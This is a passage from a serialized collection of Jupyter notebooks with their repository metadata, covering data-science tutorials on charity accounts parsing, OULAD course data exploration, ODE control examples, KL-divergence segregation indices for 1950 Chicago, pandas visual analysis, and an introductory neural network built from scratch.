accounts", "_____no_output_____" ] ], [ [ "# get a random sample of accounts to look at\nimport os\nimport random", "_____no_output_____" ], [ "accounts = {\"charity\": [], \"company_ixbrl\": [], \"company_pdf\": []}\nfor a in os.listdir(\"accounts\"):\n if a.startswith(\"GB-CHC\"):\n accounts[\"charity\"].append(a)\n elif a.startswith(\"GB-COH\"):\n if a.endswith(\".html\"):\n accounts[\"company_ixbrl\"].append(a)\n elif a.endswith(\".pdf\"):\n accounts[\"company_pdf\"].append(a)\naccounts", "_____no_output_____" ], [ "charity_sample =random.sample(accounts[\"charity\"], 10)", "_____no_output_____" ], [ "assets_regex = r'(total net assets|net (total )?assets)'", "_____no_output_____" ], [ "for c in charity_sample:\n c\n cpdf = pdfplumber.open(os.path.join(\"accounts\", c))\n try:\n df = get_finances(cpdf)\n except:\n continue\n if not isinstance(df, pd.DataFrame) or 'text' not in df.columns:\n continue\n assets = df[df[\"text\"].str.contains(assets_regex, case=False)]\n if assets.size > 0:\n assets", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
e72d9575d5db8a8ae5365ae127fd176874ee34d8
1,447
ipynb
Jupyter Notebook
dictionary/iterate_over_dictionary_solution.ipynb
eric999j/Udemy_Python_Hand_On
7a985b3e2c9adfd3648d240af56ac00bb916c3ad
[ "Apache-2.0" ]
1
2020-12-31T18:03:34.000Z
2020-12-31T18:03:34.000Z
dictionary/iterate_over_dictionary_solution.ipynb
cntfk2017/Udemy_Python_Hand_On
52f2a5585bfdea95d893f961c8c21844072e93c7
[ "Apache-2.0" ]
null
null
null
dictionary/iterate_over_dictionary_solution.ipynb
cntfk2017/Udemy_Python_Hand_On
52f2a5585bfdea95d893f961c8c21844072e93c7
[ "Apache-2.0" ]
2
2019-09-23T14:26:48.000Z
2020-05-25T07:09:26.000Z
18.551282
79
0.461645
[ [ [ "# Write a Python program to iterate over dictionaries using for loops.\n\nd = {'x': 10, 'y': 20, 'z': 30} \nfor dict_key, dict_value in d.items():\n print(dict_key,'->',dict_value)\n\t\n", "x -> 10\ny -> 20\nz -> 30\n" ], [ "d = {'x': 10, 'y': 20, 'z': 30} \nfor dict_key, dict_value in d.items():\n print(dict_key,'->',dict_value)", "x -> 10\ny -> 20\nz -> 30\n" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
e72d9681a787260a75d9533fb4175b8e3de8cfe3
35,416
ipynb
Jupyter Notebook
0_table data EDA.ipynb
springkind/OULAD
92e956740bfa8133bbfdc2d05bdb9cb5f00d423a
[ "CC-BY-4.0" ]
null
null
null
0_table data EDA.ipynb
springkind/OULAD
92e956740bfa8133bbfdc2d05bdb9cb5f00d423a
[ "CC-BY-4.0" ]
2
2021-08-16T15:23:38.000Z
2021-08-17T15:41:52.000Z
0_table data EDA.ipynb
springkind/OULAD
92e956740bfa8133bbfdc2d05bdb9cb5f00d423a
[ "CC-BY-4.0" ]
null
null
null
29.390871
158
0.349531
[ [ [ "import pandas as pd", "_____no_output_____" ], [ "courses = pd.read_csv('./data/courses.csv')\nassessments = pd.read_csv('./data/assessments.csv')\nvle = pd.read_csv('./data/vle.csv')\nstudentInfo = pd.read_csv('./data/studentInfo.csv')\nstudentRegistration = pd.read_csv('./data/studentRegistration.csv')\nstudentAssessment = pd.read_csv('./data/studentAssessment.csv')\nstudentVle = pd.read_csv('./data/studentVle.csv')", "_____no_output_____" ] ], [ [ "## 테이블 데이터 확인", "_____no_output_____" ], [ "### COURSES", "_____no_output_____" ] ], [ [ "courses.head()", "_____no_output_____" ] ], [ [ "courses 데이터에서는 시작 학기에따라 B(2월 시작), J(10월 시작)를 code_presentation에 붙인다.\\\n같은 강좌라도 학기별로 구조나 세부 내용이 다를 수 있기 때문에 따로 분리해서 봐야하는데,\\\ncode_module이 CCC, EEE, GGG인 코스의 경우 이전 기수 B, J 수강 내역이 없는 데이터로 이루어져 있다.", "_____no_output_____" ] ], [ [ "courses[courses['code_module'] == 'CCC']", "_____no_output_____" ] ], [ [ "### ASSESSMENTS", "_____no_output_____" ], [ "강좌마다 학기별로 나간 과제에 대한 정보.\\\n모든 강좌는 몇가지 과제 후 기말 시험을 치르게 된다.\n\n- **date** : 제출일. module-presentation이 시작된 날짜 기준 0일 부터 시작. 기말고사의 date 값이 결측치일 경우 presentation의 마지막 week임.\n- **weight** : 과제 비율. Exam은 과제와 별개로 다뤄지기 때문에 100%로 표기된다. Exam 이외의 assessments의 weight를 모두 합하면 100%가 됨.\n- **assessment_type** : \n - Tutor Marked Assessment (TMA)\n - Computer Marked Assessment (CMA)\n - Final Exam (Exam)", "_____no_output_____" ] ], [ [ "assessments.head()", "_____no_output_____" ] ], [ [ "### VLE", "_____no_output_____" ], [ "온라인 학습 환경의 html page, pdf 파일 등의 정보. 리소스? 학습용 meterial.\n\n- **week_from ~ week_to** : 몇주부터 몇주까지 해당 meterials를 학습하도록 설계되어있는지.", "_____no_output_____" ] ], [ [ "vle.head()", "_____no_output_____" ], [ "vle[vle['week_from'].notna()].head()", "_____no_output_____" ] ], [ [ "### studentInfo", "_____no_output_____" ], [ "- **imd_band** : 지역별 결핍(빈곤) 지수. 
소득, 고용, 교육, 건강, 범죄 등으로 계산됨.\\\nhttps://en.wikipedia.org/wiki/Multiple_deprivation_index", "_____no_output_____" ] ], [ [ "studentInfo.head()", "_____no_output_____" ] ], [ [ "### studentRegistration", "_____no_output_____" ], [ "module-presentation 등록 데이터. module-presentation이 시작된 시점과 연관이 있다.\n\n- **date_registration** : 등록일자. -30인 경우 해당 수강생이 module-presentation이 시작되기 30일 전에 등록한 것.\n- **date_unregistration** : 수강취소를 한 경우 기록됨. 12인 경우 module-presentation이 시작된 후 12일 후에 등록 취소한 것. 빈값일 경우 수강을 끝까지 잘 마친 것.\n\ndate_unregistration이 빈 값이 아닐 경우 studentInfo.csv의 final_result 컬럼이 'Withdrawal'로 표기됨.", "_____no_output_____" ] ], [ [ "studentRegistration.head()", "_____no_output_____" ], [ "studentRegistration[studentRegistration['date_unregistration'].notna()].head()", "_____no_output_____" ] ], [ [ "### studentAssessment", "_____no_output_____" ], [ "과제 제출 현황.과제를 제출 안한 경우 기록되지 않는다.\\\n만약 과제 결과가 시스템에서 누락될 경우 기말고사 제출내역은 기록되지 않음.\n\n- **date_submitted** : module-presentation 시작 날짜 기준, 제출일.\n- **is_banked** : a status flag indicating that the assessment result has been transferred from a previous presentation.(이전 presentation과 연관성이 있는지?)\n- **score** : 0 ~ 100 사이의 값. 40보다 작을 경우 Fail.", "_____no_output_____" ] ], [ [ "studentAssessment.head()", "_____no_output_____" ] ], [ [ "### studentVle", "_____no_output_____" ], [ "학생들이 VLE와 상호작용한 데이터.\n\n- **id_site** : VLE meterial id.\n- **date** : module-presentation 시작 날짜 기준, 이벤트 날짜.\n- **sum_click** : 해당 날짜에 있었던 클릭 수 집계.", "_____no_output_____" ] ], [ [ "studentVle.head()", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ] ]
e72d99614ed39e708d73491cfb4a3fb6ba9b3986
111,612
ipynb
Jupyter Notebook
Apuntes de clases/b04_Clase 13 de marzo_Sistemas de control.ipynb
AlexRojas06/Trabajos_realizados_en_clase
d13682db960cdebceffbdaaf14dc695129beae2d
[ "MIT" ]
null
null
null
Apuntes de clases/b04_Clase 13 de marzo_Sistemas de control.ipynb
AlexRojas06/Trabajos_realizados_en_clase
d13682db960cdebceffbdaaf14dc695129beae2d
[ "MIT" ]
null
null
null
Apuntes de clases/b04_Clase 13 de marzo_Sistemas de control.ipynb
AlexRojas06/Trabajos_realizados_en_clase
d13682db960cdebceffbdaaf14dc695129beae2d
[ "MIT" ]
null
null
null
528.966825
76,592
0.943106
[ [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.integrate import odeint", "_____no_output_____" ] ], [ [ "$$\\dot{x}+c{x}=0$$\n$$V(x)=\\frac{1}{2}{x^2}$$\n", "_____no_output_____" ] ], [ [ "def f(x,t):\n dx=-x\n return dx\n\n#t = np.linspace(0,20,200)\nt=np.arange(0,3,.1)\nx0=-.0043\nys=odeint(f,x0,t)\n\nplt.plot(t,ys[:,0])", "_____no_output_____" ] ], [ [ "$$\\dot{x_1}=-x_1$$\n$$\\dot{x_2}=-2x_2$$\n\n$$V(x)=\\frac{1}{2}{x^2}$$\n$$\\dot{V}(x) = {x}\\dot{x} = [x_1,x_2][{\\dot{x}_1}{\\dot{x}_2}]^T=x_1\\dot{x}_1+x_2\\dot{x}_2$$\n\n$$\\dot{V}(x_1,x_2)=-{x_1}^2-2{x_2}^2$$", "_____no_output_____" ] ], [ [ "def f(x,t):\n x1,x2=x\n dx1=-x1\n dx2=-2*x2\n return [dx1,dx2]\n\n#t=np.linspace(0,20,200)\nt=np.arange(0,3,.1)\nx0=[4,4]\nys=odeint(f,x0,t)", "_____no_output_____" ], [ "y1=np.linspace(-8.0,8.0,20)\ny2=np.linspace(-8.0,8.0,20)\nX,Y=np.meshgrid(y1,y2)\n\nU,V=f([X,Y],0)\nplt.figure(figsize=(9,8))\nQ=plt.quiver(X,Y,U,V,color='r')\nplt.plot(ys[:,0],ys[:,1],'b-') #path\nplt.plot([ys[0,0]], [ys[0,1]], 'o')#start\nplt.plot([ys[-1,0]], [ys[-1,1]], 's')#end", "_____no_output_____" ], [ "def f(x,t):\n u=-2*x**2\n dx1=x**2+u\n return dx1\n\n#t=np.linspace(0,20,200)\nt=np.arange(0,3,.1)\nx0=[2,1]\nys=odeint(f,x0,t)\n\nplt.plot(t,ys[:,0])\nplt.plot(t,ys[:,1])", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e72dc21cc21b8239b5999a4645748df49d409ac9
195,461
ipynb
Jupyter Notebook
example_distortion.ipynb
ceciledebezenac/segregation_index
0e57b925450dad60e7cd9f987ba5ce499edccd8f
[ "MIT" ]
1
2021-04-14T14:45:53.000Z
2021-04-14T14:45:53.000Z
example_distortion.ipynb
ceciledebezenac/segregation_index
0e57b925450dad60e7cd9f987ba5ce499edccd8f
[ "MIT" ]
1
2021-05-27T14:53:58.000Z
2021-05-27T14:53:58.000Z
example_distortion.ipynb
ceciledebezenac/segregation_index
0e57b925450dad60e7cd9f987ba5ce499edccd8f
[ "MIT" ]
null
null
null
483.814356
77,336
0.941779
[ [ [ "# Mulitscale segregation measures using a KL-divergence based method", "_____no_output_____" ], [ "This is an example notebook to demonstrate the use of this particular python module, segregation_distortion. This particular module from the distortion library can be used to calculate similar variations of a segregation measure, the distortion index over an entire city, given the population categories and the coordinates of spatial units. Other libraries are required to be installed before running the code. They are automatically installed when setting up the modules. \n\n### Requirements", "_____no_output_____" ] ], [ [ "#change indexes names and add a quick description of why the index is useful. \n#unit testing for the class framework\n#GIO interface for uploading data and plotting the map\n#make a script for command line\nfrom divergence import segregation_distortion as seg\nimport geopandas as gdp\nimport pandas\nimport itertools as it\nimport matplotlib.pyplot as plt\nimport timeit", "_____no_output_____" ] ], [ [ "### Read in and analyse the data\n\nNow let's actually read in some data to work with. The module is designed to run with any geolocated data, provided categorial variables are included as well as a geometry columns used by python for plotting and neighbourhood attribution. We will work with 1950 census data from Chicago. This data can be downloaded here (github link). We use Geopandas to load the dataframe. Check for more detailed documentation on Geopandas here (lien internet). ", "_____no_output_____" ] ], [ [ "geochicago=gdp.read_file('/Users/cdebezenac/Documents/chicago_segregation/data/chicago1950.shp')", "_____no_output_____" ] ], [ [ "We will want to get a better look at the raw data (although this set has already been cleaned up a bit) to check for empty, redundant cells or any other flaw that could make running our code difficult. 
", "_____no_output_____" ] ], [ [ "print('There are ' + str(len(geochicago))+' tracts in Chicago.\\n\\n',geochicago.head(),geochicago.columns)", "There are 937 tracts in Chicago.\n\n GISJOIN2 SHAPE_AREA TRACT B0E001 B0E002 B0E003 B0E004 B0E005 \\\n0 17003100846 2.614179e+06 0846 460 150 105 110 175 \n1 17003100867 3.333835e+05 0867 35 35 15 30 85 \n2 17003100865 6.513552e+05 0865 125 55 35 45 110 \n3 17003100863 7.972477e+04 0863 25 10 10 0 20 \n4 17003100864 8.086402e+04 0864 20 5 5 5 10 \n\n B0E006 B0E007 ... B0E014 B0E015 Total White Nonwhite Negro \\\n0 285 415 ... 140 420 11416 11411 5 4 \n1 80 130 ... 5 25 3449 3446 3 0 \n2 200 215 ... 30 50 4969 4966 3 3 \n3 5 30 ... 10 5 842 842 0 0 \n4 5 90 ... 10 20 1013 1013 0 0 \n\n % White % Nonwhite % Negro \\\n0 0.999562 0.000438 0.000350 \n1 0.999130 0.000870 0.000000 \n2 0.999396 0.000604 0.000604 \n3 1.000000 0.000000 0.000000 \n4 1.000000 0.000000 0.000000 \n\n geometry \n0 POLYGON ((685476.7393863574 509025.6236453776,... \n1 POLYGON ((687619.6943893731 508023.3009851112,... \n2 POLYGON ((686059.3572701956 507863.6809653796,... \n3 POLYGON ((687112.3453625296 508798.6291569208,... \n4 POLYGON ((687515.20576993 508834.0681936329, 6... \n\n[5 rows x 26 columns] Index(['GISJOIN2', 'SHAPE_AREA', 'TRACT', 'B0E001', 'B0E002', 'B0E003',\n 'B0E004', 'B0E005', 'B0E006', 'B0E007', 'B0E008', 'B0E009', 'B0E010',\n 'B0E011', 'B0E012', 'B0E013', 'B0E014', 'B0E015', 'Total', 'White',\n 'Nonwhite', 'Negro', '% White', '% Nonwhite', '% Negro', 'geometry'],\n dtype='object')\n" ] ], [ [ "After a quick look at the variable dictionary, we can start to understand the data. The first columns represent administrative code for the area, the 'B0...' columns are attributed to income groups and the 'White','Nonwhite','Negro' represent the ethnic affiliation count in each tract. We note that 'Nonwhite' accounts for 'Negro' as well as others and that the 1950 naming convention is somewhat out of date. 
", "_____no_output_____" ] ], [ [ "#seperate other from black\ngeochicago['Other']=geochicago['Nonwhite']-geochicago['Negro']\ngeochicago['% Other']=geochicago['% Nonwhite']-geochicago['% Negro']\n#rename a column\ngeochicago.rename(columns={'Negro':'Black'},inplace=True)", "_____no_output_____" ] ], [ [ "### Create the city framework for segregation analysis\n\nLet's now initialise our divergence object used as a city frame for the calculation of the indices. If we want to calculate the local indices for one single unit, we create an instance of the class LocalDivergenceProfile. If we wish to compare measures over all tracts, we use the DivergenceProfiles class from the div module. Initially, its attributes are: the dataframe given as a parameter, the variable names used for the population segmentation, the size of the city, the shape of the city, the coordinates of all units, a Demographics instance (see below), sup_distortion which is the greatest segregation index possible given the overall statistics of the city. The latter is used to normalise local indices. ", "_____no_output_____" ] ], [ [ "distortion_chicago=seg.DivergenceProfiles(geochicago,['White','Black','Other'])", "14 spatial units have been left out because of null values over all groups. Check your data or continue.\n" ] ], [ [ "### Initialise the neighbourhood structure to compute the divergence profiles\n\nThe max_distortion index and the excepted_divergence indices are both spatial. Therefore, before calculating anything (see help(LocalDivergenceProfile) for detailed computation of indices) we will need to set up a neighbourhood structure with the set_neighbourhood() method. Keeping this example simple, we will simple use the default distance measure which is the crow distance between centroids of tracts. This method is quite computationnaly expensive as it orders all 937 neighbours of all 937 tracts! 
It has been sped up since previous versions by vectorising operations as much as possible using numpy. Parallelising the code could optimise it further but this technique has not been explored here. Nevertheless, from several hours (up to a whole day in the first tries), this will take a dozen seconds on the Chicago data. Note that the complexity is not linear, trying it out on London for example, with well over 1000 units will considerably slow down the process. ", "_____no_output_____" ] ], [ [ "%time distortion_chicago.set_neighbourhood(path='euclidean')", "CPU times: user 12.9 s, sys: 9.62 ms, total: 12.9 s\nWall time: 12.9 s\n" ] ], [ [ "Once the structure is known, the bulk of the work is done! The rest is numpy array operations on population counts (see divergence documentation for more detail). Setting the KL divergence profiles for all 937 units will only take a few seconds more!", "_____no_output_____" ] ], [ [ "%time distortion_chicago.set_profiles()", "CPU times: user 6.93 s, sys: 16.8 ms, total: 6.95 s\nWall time: 6.95 s\n" ] ], [ [ "### Update the data\n\nNow we could use the raw data included in the DivergenceProfiles object, but we would rather use something we can actually plot easily using the basic geopandas library. So let's update the dataframe we fed into the city object and add columns representing the local variables and check if realistic indices have been added to the end. You may get a SettingWithCopyWarning when updating. While this should usually never be overlooked, this is raised because the attribute dataframe is a copy of the original one the user actually loads as a parameter. 
", "_____no_output_____" ] ], [ [ "distortion_chicago.update_data()\n#distortion_chicago.dataframe.head()", "_____no_output_____" ] ], [ [ "### View the results\n\nEssentially, what the algorithm is doing to compute the local indices is summarise local profiles (described in the divergence documentation: max_index will average the superiour envelope of the profile). These trajectories can hide very relevant information on segregation as well as geographic patterns (neighbourhood definition for instance). For an overview, let's plot all of these. \n\n#### Profiles", "_____no_output_____" ] ], [ [ "distortion_chicago.plot_profiles([i for i in range(920)],(10,6))", "_____no_output_____" ], [ "#isolate fewer profiles, here the profile of the unit indexed by 0:\ndistortion_chicago.plot_profiles([0],(10,6))", "_____no_output_____" ] ], [ [ "#### Index distribution\n\nAnother good way of getting a quick look at the results is to plot the distribution of the indices into histograms available with maplotlib. We will try to plot something a litle nicer than the default python plot and save it on to our computer. This is done with the plot_distribution() method of the DivergenceProfiles class. ", "_____no_output_____" ] ], [ [ "distortion_chicago.plot_distribution(variable='max_index')", "_____no_output_____" ] ], [ [ "#### Spatial representation: Chicago map\n\nThe most interesting attribute of local segregation measures are that you can plot them on to the map of the city using the plot_map() method.", "_____no_output_____" ] ], [ [ "distortion_chicago.plot_map(variable='max_index_normal')", "_____no_output_____" ] ], [ [ "From this map, we can analyse the segregration trend in Chicago. The red tracts are those that have a high normalised distortion index. The most extreme values reach 45% of the value of the theoretically most segregated Chicago possible! 
They are visably all clustered in a middle easter area, where the first community of Blacks had settled before moving down south in the second half of the century. Chicago shows very high segregation between White and Black population. Although indices tend to decrease with time due to increased ethnic diversity, it still is one of the most striking examples among US cities. ", "_____no_output_____" ], [ "### Save the results\n\nOnce the dataframe has been updated it can be saved in shapefile format on to the user's computer by using the GeoPandas framework or using the built-in function in the DivergenceProfiles class, save_dataframe():", "_____no_output_____" ] ], [ [ "distortion_chicago.save_dataframe('distortion_data_chicago')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ] ]
e72dc24604c754a85bd5b47970570c045db4522f
5,481
ipynb
Jupyter Notebook
tests/notebooks/examples.ipynb
rishigarg94/pandas-visual-analysis
c9569878a44fb0f5d0acd8779ff65d51e1c1bd95
[ "MIT" ]
16
2020-09-03T20:58:40.000Z
2022-03-19T01:12:31.000Z
tests/notebooks/examples.ipynb
rishigarg94/pandas-visual-analysis
c9569878a44fb0f5d0acd8779ff65d51e1c1bd95
[ "MIT" ]
23
2020-08-26T19:47:54.000Z
2022-01-21T20:38:15.000Z
tests/notebooks/examples.ipynb
rishigarg94/pandas-visual-analysis
c9569878a44fb0f5d0acd8779ff65d51e1c1bd95
[ "MIT" ]
4
2020-08-26T19:46:37.000Z
2021-09-30T06:24:19.000Z
21.664032
120
0.528371
[ [ [ "import sys\nsys.path.append(\"../../src\")", "_____no_output_____" ], [ "import ssl\n\nssl._create_default_https_context = ssl._create_unverified_context", "_____no_output_____" ] ], [ [ "## Default mpg", "_____no_output_____" ] ], [ [ "import pandas as pd\nfrom pandas_visual_analysis import VisualAnalysis\n\ndf = pd.read_csv(\"https://raw.githubusercontent.com/mwaskom/seaborn-data/master/mpg.csv\")\n\nVisualAnalysis(df)", "_____no_output_____" ] ], [ [ "## DataSource", "_____no_output_____" ] ], [ [ "from pandas_visual_analysis import VisualAnalysis, DataSource\n\nds = DataSource(df)\nVisualAnalysis(ds)", "_____no_output_____" ] ], [ [ "## Categorical Columns", "_____no_output_____" ] ], [ [ "VisualAnalysis(df, categorical_columns=[\"name\", \"origin\", \"model_year\", \"cylinders\"])", "_____no_output_____" ] ], [ [ "## Layout", "_____no_output_____" ] ], [ [ "VisualAnalysis(df, layout=[[\"Scatter\", \"Scatter\"], [\"ParallelCoordinates\"]])", "_____no_output_____" ] ], [ [ "## Get all Widgets", "_____no_output_____" ] ], [ [ "VisualAnalysis.widgets()", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72ddf39196cb7706d103e165b5db16a89353fce
94,811
ipynb
Jupyter Notebook
Neural_Network_Fundamentals/1_NN_from_scratch.ipynb
romanarion/InformationSystemsWS1718
82a89f8288de9f2b5ef0bad8e9e5bbe2dfee317a
[ "MIT" ]
null
null
null
Neural_Network_Fundamentals/1_NN_from_scratch.ipynb
romanarion/InformationSystemsWS1718
82a89f8288de9f2b5ef0bad8e9e5bbe2dfee317a
[ "MIT" ]
null
null
null
Neural_Network_Fundamentals/1_NN_from_scratch.ipynb
romanarion/InformationSystemsWS1718
82a89f8288de9f2b5ef0bad8e9e5bbe2dfee317a
[ "MIT" ]
null
null
null
58.023868
11,674
0.733586
[ [ [ "# Neural Network Fundamentals", "_____no_output_____" ], [ "This blog post is a guide to help readers build a neural network from the very basics. It starts with an introduction to the concept of a neural networks concept and its early development. A step-by-step coding tutorial follows, through which relevant concepts are illustrated. Later in the post, there is also an introduction on how to build neural networks in Keras. Finally, the reader will find instructions on how to deploy the model via an API to make it accessible to anyone interested on it.", "_____no_output_____" ], [ "## Neural Networks and its early development", "_____no_output_____" ], [ "As the name tells, the idea of neural networks is inspired by how neurons work in the human brain. It is, however, crucial for the readers to know that despite the original motivation of neural networks, the NN models being used today have little resemblance to what a human brain does. In its basic form, neural networks are composed of nodes interconnected to each other in several layers. The basic form of a NN would include an input, a hidden and an output layer. The number of nodes and layers can add to the complexity and efficiency of neural networks. \n\nThe McCulloch-Pitts model of neuron in 1943 was one of the earliest simplified version of neural networks. It consisted of a simple neuron which received a weighted sum of inputs and output either zero if the sum was smaller than a threshold or one when it was greater than the threshold. This idea is called firing and is an interesting analogy to what an actual neuron does. Later on, in the early 1960s, Rosenblatt introduced the simple perceptron model. This was a developed version of the McCulloch-Pitts with an input and output layer. However, the linear separablilty limitation of simple perceptron took away the research interest in neural networks for a while. 
In the early 1980s, the Hopfield model of content-addressable memory, however, motivated researchers in the area again and later on with the introduction of backpropagation learning algorithm, interest in neural networks research soared. Nowadays, neural nets are used in a variety of applications to tackle problems such as classification, speech and image recognition, control systems and predictions.\n\nIn what follows, the reader will find an easy step-by-step guide on how to implement all these processes from scratch, the coding part of which draws inspiration from the works of [Nielsen, 2017](http://neuralnetworksanddeeplearning.com/index.html), [Dima, 2016](http://www.cristiandima.com/neural-networks-from-scratch-in-python/) and [Rashid, 2016](https://ebook4expert.com/2016/07/12/make-your-own-neural-network-ebook-free-by-tariq-rashid-epubmobi/).", "_____no_output_____" ], [ "# NN from scratch\n## Problem Statement\nThe best way to understand how neural networks work is to build one yourself from scratch.\nThe understanding becomes even more comprehensive if there is a particular problem that can be solved using NNs. Therefore let's start our work by taking a look at the picture below.", "_____no_output_____" ], [ "<img src=\"pics/problem.png\" alt=\"Drawing\" style=\"width: 600px;\"/>", "_____no_output_____" ], [ "There are handwritten numbers that you want computer to correctly classify. This would be an easy task for a person but at least for a long period of time was an extremely complicated one for a machine. \n\nEven though the computer is faster than the human brain in numeric computations, the brain outperforms the computer in some other tasks. Many of those tasks are related to the human ability for sentience (which is a concept different from intelligence). 
The trick is to find a way, so that the computer could apply its numeric computation skills to solve these later tasks (at least to some degree).\n\nThe first step would be to limit the scope of the task. In our particular case the broad task of image recognition will be addressed as a classification problem - a task of giving an object a label from a given set of labels.\n\nAs we will see during the process of building our own NN, its output is based almost exclusively on application of linear algebra methods. Despite the name (which is sometimes related to the fear of artificial intelligence), neural networks in fact are much more related to statistical methods (like regression analysis or curve fitting) than to the way human brain works [[Stuart Reid, 2014](http://www.turingfinance.com/misconceptions-about-neural-networks/)]. \n\nNNs are inspired by human brain only to certain extent. For instance the main element that makes them similar is a multilayer net structure of simple elements that are connected in some way, receiving and transmitting information. But the structure of the human brain is much more complicated, besides it is self-organizing and adaptive in contrast to the fixed manually designed architecture of a NN. 
Hence, there is a good reason to stop being afraid of neural networks and instead to create one ourselves.", "_____no_output_____" ], [ "<img src=\"pics/neurons_net3.png\" alt=\"Drawing\" style=\"width: 500px;\"/> [Source: [Pixabay.com](https://pixabay.com/)]", "_____no_output_____" ], [ "## Schematic Representation\n\nA complex multilayer structure that all neural networks have in common in a simplified way can be depicted using the following picture.", "_____no_output_____" ], [ "<img src=\"pics/neural_network1.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "All we need in order to implement such a structure is base Python and numpy, a library for numerical computation, which we will be using to do linear algebra. \n\nFirst let's determine the elements of a neural network depicted above: nodes, layers, weights across nodes and activation functions.\n\n**Nodes.** A node is basically a point where data points are received, processed and then transferred to the node. A node could be either an endpoint or a redistribution point or even both when iterations are done through the learning algorithm. The number of nodes to use is optional.\n\n**Layers.** A layer consists of one or several nodes. The initial layer in the network is called the input layer and it is the entry point through which the data is fed into the neural net. The middle layers are called hidden layer because the computation results of them are not directly visible to someone interacting with the neural net. In the hidden layers, which can range from one to thousands, the features are transformed and most of the structure (both linear and nonlinear) is captured. Finally, there is the final layer, from which results are output. The nodes in each layer are fully interconnected to the ones in the next and the previous layers. \n\nIn our case we have a structure with 3 layers: input, output and one hidden layer. 
The number of nodes in the input (\"i_n\"), hidden (\"h_n\") and output (\"o_n\") layers are 3, 5 and 2 respectively. In Python, such a structure can be represented in the following way:", "_____no_output_____" ] ], [ [ "# Load the package to work with numbers:\nimport numpy as np\n\n# Determine the structure of the NN:\ni_n = 3\nh_n = 5\no_n = 2", "_____no_output_____" ] ], [ [ "**Weights.** In order to transfer an input data point to the next layer, a predetermined number (called weight) is stored in each connection from the sender node to the receiver node. Each weight accounts for the impact between the interconnected nodes.\n\nInitially, we assign weights between nodes in neighboring layers randomly. This is needed only for the sake of initializing the structure. Later these weights will be changed in order to solve our classification problem. The weight updating will be better described in the following sections.\n\nNeural nets will have n-1 matrices of weights, where n is the number of layers in the NN. You can imagine these weight matrices sitting between two layers representing the strength of the connection between every single node of neighbouring layers. 
Thus, each of these matrices will be of size f x p, where p is the number of nodes in the preceding layer and f is the number of nodes in the following layer.\n\nThis becomes more clear once you check the code below that creates 2 matrices of weights:\n* matrix of weights between input and hidden layers (\"w_i_h\") - 5 by 3 matrix\n* matrix of weights between hidden and output layers (\"w_h_o\") - 2 by 5 matrix.\n\nSuch a dimensions of matrices are necessary in order to accomplish matrix and vector multiplications that are done in the following stages.", "_____no_output_____" ] ], [ [ "# Randomly define the weights between the layers:\nw_i_h = np.random.rand(h_n, i_n) # create an array of the given shape and populate it with random values.\nw_h_o = np.random.rand(o_n, h_n) \n\n# Show matrices of randomly assigned weights:\nw_i_h\n# w_h_o # uncomment this line in order to see the values for w_h_o.\n# Use Cmd + / in MacOS and CTRL + / in MS Windows as a shortcut to comment/uncomment lines.", "_____no_output_____" ] ], [ [ "**Activation Function.** The remaining element of the NN's structure is an activation function - a function which transforms an input data point that it receives from the previous nodes to an output value which will be the input for the nodes in the next layer. The activation function plays an important role in the efficiency of the neural network as it accounts for non-linearity of data. \nIt is to certain extent inspired by the concept of \"firing\", which means that neurons \"fire\" or transmit information further only if the input surpasses certain threshold. 
The simplest activation function can be represented by a step function as on the picture below.", "_____no_output_____" ], [ "<img src=\"pics/step_function.png\" alt=\"Drawing\" style=\"width: 700px\";/> [Source: [Research Gate](https://www.researchgate.net/figure/Three-different-types-of-transfer-function-step-sigmoid-and-linear-in-unipolar-and_306323136)]", "_____no_output_____" ], [ "In our NN, we will use a slightly more elaborate activation function, the sigmoid function (logistic), which allows for more efficient use of the input data. Extended description of various activation functions, their benefits and disadvantages is given in sections below.", "_____no_output_____" ] ], [ [ "# Determine activation function:\ndef sigmoid(x):\n # np.exp() calculates the exponential\n # of all elements in the input array.\n return 1 / (1 + np.exp(-x)) \n", "_____no_output_____" ], [ "# Draw activation function:\nimport matplotlib.pyplot as plt\n\n# return 100 evenly spaced numbers over an interval from -10 to 10.\nx = np.linspace(-10, 10, 100) \n# plot sigmoid function for sampled values:\nplt.plot(x, sigmoid(x)) \nplt.show()", "_____no_output_____" ] ], 